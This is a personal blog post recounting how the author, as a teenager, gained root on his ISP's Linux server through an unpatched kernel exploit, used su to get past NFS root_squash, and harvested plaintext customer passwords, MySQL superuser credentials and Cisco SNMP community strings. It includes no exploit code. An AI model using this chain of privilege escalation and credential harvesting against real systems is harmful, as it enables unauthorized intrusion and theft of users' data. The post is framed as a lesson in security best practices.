Image of Cortney & Jeremy

Why Best Practices Are Important (or: How I Pwn’d The Shit Out Of My ISP)

by Jeremy L. Gaddis on September 28, 2012 · 3 comments

in Security

Post image for Why Best Practices Are Important (or: How I Pwn’d The Shit Out Of My ISP)

Note: The events described herein took place many, many years ago (the statute of limitations has long since expired!), but the moral of the story remains the same. This topic came up on IRC a few nights ago and since a) several were interested in the story and b) I’m heading out to DerbyCon shortly, the timing seemed appropriate.

It’s 2 a.m. and I’m the stereotypical inquisitive teenager furiously typing away on the PC in the corner of my darkened bedroom.

I had connected — via dialup — to my ISP and used SSH to access one of their servers (let’s call it “alpha“), an x86 box running Red Hat Linux (RHL, not RHEL). This server was running telnet, SSH and FTP daemons in order to provide remote access to both e-mail and the files in the user’s home directory (mostly so that one could dump stuff in ~/public_html/ and make it available via HTTP). In addition, this was the only server that users could directly log in to.

Though I had logged in to alpha hundreds of times before to send and receive email, I’d never really “looked around” the system. For whatever reason, I became curious and started “exploring” in an attempt to see how my ISP had set their environment up.

One of the first things I noticed was that user home directories were mounted via NFS, which made sense since the HTTP server ran on another machine. Likewise, /var/spool/mail was mounted via an NFS share from the mail server.

In all, there were four filesystems mounted via NFS on alpha:

  • /home/a/ mounted over NFS from server bravo,
  • /home/b/ mounted over NFS from server charlie,
  • /home/c/ mounted over NFS from server delta, and
  • /var/spool/mail/ mounted over NFS from server echo.

After a bit of looking around, I discovered the meaning behind the layout of /home.

Regular customers had their home directories under /home/a/, business customers had their home directories under /home/b/, and the home directories of the administrators lived under /home/c/.

Naturally, I was drawn to /home/c/.

The home directories of the system administrators themselves were accessible by anyone, although they contained many subdirectories that weren’t accessible due to permissions. I spent a bit of time exploring these files and directories that I did have access to but, alas, there was not much of interest to be found.

But I wanted access to the rest of the files and, luckily, it wasn’t hard to get.

A local root vulnerability for older versions of the Linux kernel had been discovered a good while before. Unfortunately for me, it had long since been fixed and new versions made available. Fortunately, however, the administrators at my ISP (we’ll call them “Alice” and “Bob“) hadn’t bothered updating their servers.

A little bit later, I had tweaked the exploit code slightly in order to work on this server, compiled it on my local machine and transferred it to alpha. It only took a few seconds to execute it.

# id
uid=0(root) gid=0(root) groups=0(root)

I had gained root access on alpha, the server belonging to my ISP!

My job wasn’t done yet, however.

You see, there’s an NFS server option called root_squash. This option prevents the root user on an NFS client from actually have root privileges to the mounted filesystems. Thus, while I was root on alpha, I still couldn’t access any of those files I wanted to. Luckily, there’s an easy fix for that:

# su alice
$ id
uid=1000(alice) gid=100(users) groups=100(users)

I was now, in effect, logged in as one of the system administrators and had access to all of their files.

This, of course, gave me access to all of their files which led to an interesting discovery — they kept all of their user’s passwords in plain-text!

When I had noticed that they were using NFS to share filesystems across servers, I had naturally assumed that they were also using NIS — the two often go hand-in-hand. Instead, when a user’s password needed changed, they’d update it locally on a central server. Custom scripts on that server then took care of pushing it out to all of their other servers (including their RADIUS servers), thus keeping everyone’s passwords synchronized across their servers.

I’d found the treasure — getting plain-text versions of every user’s passwords is quite an achievement!

Looking at their script, I gained insight into how the process worked. The script would be invoked on demand whenever necessary and it would then carry out its job without any interaction required from the user running it.

But where was it getting the passwords from? MySQL.

While quite popular today, MySQL was still fairly new at the time and, I’ll confess, I didn’t know much about it. Luckily, I had a couple of PCs at home running Linux and, soon afterwards, was intimately familiar with MySQL from an administrator perspective.

Armed with the MySQL credentials from their scripts, I connected to the MySQL server and started looking around. I had already found the proverbial pot of gold, but I was about to find another pot as well.

Like pretty much every other ISP (at the time), this one had a large infrastructure running — almost exclusively — Cisco gear. And, like pretty much every other ISP, they used SNMP (mostly via homebrew Perl scripts) to manage it.

The credentials that their custom script used to access their password database in MySQL had superuser privileges on the database server. This script that only needed to read data from rows in a single table in a single database actually had full permissions to every database in existence.

This oversight granted me access to a separate database on the MySQL server — the one where they stored their per-device SNMP community strings. Amazingly, in stark contrast to violating every other best practice in existence, every Cisco device on their network used separate read-only and read-write community strings. Unfortunately for them, I was staring at all of ‘em.

I don’t recall the name now but there existed a program which, given an SNMP read-write community string, would quickly download the running configuration off of Cisco devices and save it locally (I’m sure that, today, there are probably hundreds of these). Armed with valid user credentials to every server on their network, information gathering wasn’t a problem. The zone files on their primary DNS server, for example, were well commented and described what every device was.

A short time later, I was reading through the running configurations of their core infrastructure devices and, armed with the read-write community strings, I could have made any changes I wanted to.

Summary

In a short period of time, I had escalated my privileges from those of a normal user to the superuser.

Not only had I gained root access on one of their servers, but I had also acquired the plain-text passwords of every single customer. None of us customers could SSH into any server except for alpha, but alice and bob could. Equipped with their passwords, now I could too.

That local root vulnerability I mentioned? Yep, it was present on every other Red Hat Linux server they were running too.

I had root access to their shared hosting servers, which hosted hundreds of customer websites.

I had access to the stored e-mail of every single customer — and the system administrators themselves.

Last, I had administrative access to every switch and router on their network.

Pwned? Fuck yeah.

Note: Next week I’ll post a “shit they should have done differently” article, explaining how following best security practices could have mitigated my attempts to compromise their environment.

{ 3 comments… read them below or add one }

Leave a Comment

Previous post:

Next post: